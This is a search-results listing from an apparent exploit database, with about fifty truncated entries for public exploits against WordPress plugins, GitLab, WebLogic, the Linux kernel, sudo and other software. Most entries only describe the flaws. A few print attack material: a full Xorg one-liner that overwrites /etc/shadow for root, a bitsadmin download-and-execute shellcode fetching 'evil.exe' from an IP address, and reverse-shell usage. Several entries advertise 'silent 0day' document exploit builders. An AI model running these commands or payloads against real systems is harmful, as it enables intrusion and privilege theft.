39001 matches found
WordPress Slider by Soliloquy 2.6.2 - (title) Stored Cross Site Scripting Vulnerability
Exploit Title: WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting XSS Authenticated Exploit Author: Abdurrahman Erkan @erknabd Vendor Homepage: https://soliloquywp.com/ Software Link: https://wordpress.org/plugins/soliloquy-lite/ Version: 2.6.2 Tested on: Kali Linux...
SPIP BigUp 4.3.1 / 4.2.15 / 4.1.17 Unauthenticated Remote Code Execution Exploit
This Metasploit module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP. The vulnerability lies in the listerfichiersparchamps function, which is triggered when the bigupretrouverfichiers parameter is set to any value. By exploiting the improper handling of multipart for...
GitLab 13.10.2 - Remote Code Execution Exploit
Exploit Title: GitLab 13.10.2 - Remote Code Execution RCE Unauthenticated Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22 Exploit Author: Jacob Baines Vendor Homepage: https://about.gitlab.com/ Software Link: https://gitlab.com/gitlab-org/gitlab...
AeroCMS 0.0.1 Shell Upload Exploit
AeroCMS-Unrestricted-File-Upload-POC Author: D4rkP0w4r Description = Upload web shell at Post Image in admin panel Step to Reproduct Login to admin panel - Posts - Add Posts - Post Image - upload malicious file shell.php - access /images/shell.php on url - shell.php page Exploit When upload succe...
Oracle Weblogic Server Deserialization MarshalledObject Remote Code Execution Exploit
An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object weblogic.corba.utils.MarshalledObject to the interface to execute code on vulnerable hosts. This module requires Metasploit: https://metasploit.com/download Current source:...
WordPress WoodMart Theme 7.1.0 Shortcodes Injection Vulnerability
The WoodMart premium theme for WordPress is vulnerable to unauthenticated arbitrary shortcodes injection in versions 7.1.0 and below. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. ==== Z://USB-00RESEARCH/WORDPRESS/...
Roxy-WI Remote Command Execution Exploit
This Metasploit module exploits an unauthenticated command injection vulnerability in Roxy-WI versions prior to 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers...
iOS / macOS Wifi Proximity Vulnerability
iOS and macOS suffered from a wifi proximity kernel double-free vulnerability in AWDL BSS Steering. if 0 iOS/MacOS wifi proximity kernel double free in AWDL BSS Steering As part of developing an exploit for CVE-2020-3843 a heap overflow in AWDL I've been looking at the code for "BSS Steering". It...
Atlassian Confluence Widget Connector Macro Velocity Template Injection Exploit
Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is not...
WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit
Exploit for unknown platform in category web applications ========================================================== WordPress new or die; &header; print " +---x STEP 1 - TRY GET ADMIN INFO\n"; $reg = $path; $reg .=...
Linux Kernel 3.16.1 FUSE Privilege Escalation Exploit
FUSE-based exploit that leverages a flaw in fs/namespace.c where it does not properly restrict clearing MNTNODEV, MNTNOSUID, and MNTNOEXEC and changing MNTATIMEMASK during a remount of a bind mount, which allows local users to gain privileges. Linux kernels through 3.16.1 are affected. / FUSE-bas...
Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization Exploit
This Metasploit module exploits the .NET deserialization vulnerability within the RadAsyncUpload RAU component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization...
Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution Exploit
Exploit for java platform in category web applications / Exploit Title: Brocade Network Advisor - Unauthenticated Remote Code Execution Date: 2017-03-29 Exploit Author: Jakub Palaczynski Vendor Homepage: https://www.broadcom.com/ CVE: CVE-2018-6443 Version: Tested on Brocade Network Advisor 14.X....
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) Exploit
Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow SEH Exploit Author: r00tpgp @ http://www.r00tpgp.com Usage: python easychat-exploit.py Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990 CVE: CVE-2004-2466 Installer: http://www.echatserver.com/ Tested on: Microsoft Window...
VMware vCenter Server Unauthenticated Log4Shell JNDI Injection Remote Code Execution Exploit
VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the root user in the case of the Linux...
Microsoft Windows 8.1 / Server 2012 - Win32k.sys Local Privilege Escalation (MS14-058) Exploit
Exploit for windows platform in category local exploits include "hd.h" // EDB Note Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar byte scode= 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x...
Redis Lua Sandbox Escape Exploit
This Metasploit module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary...
Exim < 4.90.1 - base64d Remote Code Execution Exploit
Exploit for linux platform in category remote exploits !/usr/bin/python import time import socket import struct s = None f = None def logo: print print " CVE-2018-6789 Poc Exploit" print "@straightblast ; email protected" print def connecthost, port: global s global f s =...
Nagios XI Autodiscovery Shell Upload Exploit
This Metasploit module exploits a path traversal issue in Nagios XI before version 5.8.5. The path traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as www-data. The module achieves this by creating an autodiscovery job with an id field containin...
Selenium Firefox Remote Code Execution Exploit
Selenium Server Grid versions 4.27.0 and below allows cross site request forgery because it permits non-JSON content types such as application/x-www-form-urlencoded, multipart/form-data, and text/plain and this issue in turn allows for an attacker to achieve remote code execution. This module...
Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)
/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...
OpenDocMan 1.2.7 - Multiple Vulnerabilities
OpenDocMan versions 1.2.7 and below suffer from improper access control and remote SQL injection vulnerabilities. Product: OpenDocMan Vendor: Free Document Management Software Vulnerable Versions: 1.2.7 and probably prior Tested Version: 1.2.7 Advisory Publication: February 12, 2014 without...
Dirty Pipe Local Privilege Escalation Exploit
This Metasploit module exploits a vulnerability that has been in the Linux kernel since version 5.8. It allows writing of read only or immutable memory. The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102. The module exploits this vulnerability by overwriting a suid binary with the...
Maran PHP Shop (prod.php cat) SQL Injection Vulnerability
Exploit for unknown platform in category web applications ========================================================= Maran PHP Shop prod.php cat SQL Injection Vulnerability ========================================================= Maran PHP Shop prod.php cat SQL Injection Vulnerability url:...
Microsoft Office Word DOC Silent Arbitrary Code Execution Builder Exploit
0day exploit is a program that injects any executable formatted file .exe into the desired word .doc file...
Xiaomi Mi Box Display Corruption Exploit
The vulnerability allows rescaling and corrupting the Xiaomi Mi Box model: MIBOX3, build.id : MHC19 display without any privilege requirement, thus creating an opportunity for a non-privilege malicious app to disable the basic functionalities that the TV box is offering or can even be used for...
STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation Exploit
Exploit for windows platform in category local exploits / Exploit Title: STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation Author: Parvez Anwar @parvezghh Vendor Homepage: https://www.stopzilla.com/ Software link:...
Polkit pkexec Local Privilege Escalation Exploit
This is a Metasploit module for the argument processing bug in the polkit pkexec binary. If the binary is provided with no arguments, it will continue to process environment variables as argument variables, but without any security checking. By using the execve call we can specify a null argument...
Microsoft Office Excel Silent Builder Exploit
0day exploit is a program that injects any executable formatted file .exe into the desired word .xls file. The exe is automatically executed when the project file is opened...
Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion Exploit
Exploit for hardware platform in category web applications Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion Google Dork: inurl:/+CSCOE+/ Date: 2020-08-27 Exploit Author: 0xmmnbassel Vendor Homepage:...
xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit
Exploit for multiple platform in category local exploits xorg-x11-server Local Privilege Escalation CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow or any file on most Linux, get root privileges. B...
WordPress Popular Posts 5.3.2 Remote Code Execution Exploit
This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address 192/172/127/10. The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit...
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) Vulnerability
Exploit for php platform in category web applications Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload Authenticated Exploit Author: v1n1v131r4 Vendor Homepage: http://koken.me/ Software Link: https://www.softaculous.com/apps/cms/Koken Version: 0.22.24 Tested on: Linux PoC:...
Lenovo Power Management Driver 1.67.17.48 - (pmdrvs.sys) Denial of Service Exploit
Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service PoC Exploit Author: Nassim Asrir CVE: CVE-2019-6192 Tested On: Windows 1064bit | ThinkPad T470p Vendor : https://www.lenovo.com/us/en/ Ref : https://support.lenovo.com/us/fr/solutions/len-29334 Description A...
Pligg 9.9.5 XSRF Protection Bypass and Captcha Bypass
Exploit for unknown platform in category web applications ===================================================== Pligg 9.9.5 XSRF Protection Bypass and Captcha Bypass ===================================================== Written By Michael Brooks Pligg - XSRF Protection Bypass and Captcha Bypass...
WSO Arbitrary File Upload / Remote Code Execution Exploit
This Metasploit module abuses a vulnerability in certain WSO2 products that allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0,...
SentryHD 02.01.12e - Privilege Escalation Exploit
Exploit for windows platform in category local exploits Exploit Title: SentryHD 02.01.12e Privilege Escalation Date: 18-01-2017 Software Link: http://www.minutemanups.com/ Exploit Author: Kacper Szurek Contact: http://twitter.com/KacperSzurek Website: http://security.szurek.pl/ Category: local 1...
WordPress Elementor 3.18.1 File Upload / Remote Code Execution Vulnerabilities
WordPress Elementor plugin versions 3.18.1 and below are vulnerability to remote code execution via file upload in the template import functionality. Vulnerability Summary from Wordfence Intelligence Description: Elementor = 3.18.1 AuthenticatedContributor+ Arbitrary File Upload to Remote Code...
OPNsense 23.1.11_1 / 23.7.3 / 23.7.4 Cross Site Scripting / Privilege Escalation Vulnerabilities
OPNsense versions 23.1.111, 23.7.3, and 23.7.4 suffer from cross site scripting vulnerabilities that can allow for privilege escalation. OPNsense 23.1.111 / 23.7.3 / 23.7.4 Cross Site Scripting / Privilege Escalation =========================================================== Highest Severity...
SMB12 Information Gathering Exploit
SMB12 Information Gathering is a data gathering python script that inspects SMB1 and SMB2 endpoints. It will extract various attributes from the remote server such as OS version only supported by SMB1 as per protocol definition, DNS computer name, DNS domain name, NetBIOS computer name and NetBIO...
Adobe Acrobat Reader Silent PDF Exploit 0day
0day PDF Exploit. All Chrome, Edge, Opera, Firefox, Microsoft Internet Explorer, Yandex, tested. Running smoothly Latest version. Adobe Acrobat Reader Works Seamlessly with All Versions of DC Latest version. Windows 7, Windows 8, Windows 8.1, Windows 10 Tested Works in the latest versions. All Ma...
Horde Help Viewer <= 3.1 Remote Command Execution Exploit
Exploit for unknown platform in category web applications ========================================================= Horde Help Viewer $host, 'dir=s' = $dir, 'proxy=s' = $proxy, 'proxyuser=s' = $proxyuser, 'proxypass=s' = $proxypass, 'debug' = $debug; &help unless $host; please don't try this...
Sudo 1.8.25p - Buffer Overflow Exploit
Title: Sudo 1.8.25p - Buffer Overflow Author: Joe Vennix Software: Sudo Versions: Sudo versions prior to 1.8.26 CVE: CVE-2019-18634 Reference: https://www.sudo.ws/alerts/pwfeedback.html Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting their password. For...
Android Bluetooth - Blueborne Information Leak (2) Exploit
Exploit for Android platform in category remote exploits from pwn import import bluetooth if not 'TARGET' in args: log.info"Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX" exit target = args'TARGET' servicelong = 0x0100 serviceshort = 0x0001 mtu = 50 n = 30 def packetservice, continuationstate:...
Drupal Drupalgeddon 2 Forms API Property Injection Exploit
This Metasploit module exploits a Drupal property injection in the Forms API. Drupal versions 6.x, less than 7.58, 8.2.x, less than 8.3.9, less than 8.4.6, and less than 8.5.1 are vulnerable. This module requires Metasploit: https://metasploit.com/download Current source:...
Jorani Remote Code Execution Exploit
This Metasploit module exploits an unauthenticated remote code execution vulnerability in Jorani versions prior to 1.0.2. It abuses log poisoning and redirection bypass via header spoofing and then it uses path traversal to trigger the vulnerability. It has been tested on Jorani 1.0.0. This modul...
Moodle Authenticated Spelling Binary Remote Code Execution Exploit
Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the...
WordPress MW WP Form 5.0.1 Arbitrary File Upload Vulnerability
Vulnerability Summary from Wordfence Intelligence Description: MW WP Form = 5.0.1 – Unauthenticated Arbitrary File Upload Affected Plugin: MW WP Form Plugin Slug: mw-wp-form Affected Versions: = 5.0.1 CVE ID: CVE-2023-6316 CVSS Score: 9.8 Critical CVSS Vector:...
Apache Log4j2 2.14.1 - Information Disclosure Exploit
Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure Date: 12/12/2021 Exploit Author: leonjza Vendor Homepage: https://logging.apache.org/log4j/2.x/ Version: None: printf' i| new connection from self.clientaddress0' sock = self.request sock.recv1024 sock.sendallLDAPHEADER data =...
Drupal < 7.58 - Drupalgeddon3 Authenticated Remote Code Exploit
Exploit for php platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Drupalgeddon3', 'Description' = %q CVE-2018-7602 / SA-CORE-2018-004 A remote code execution...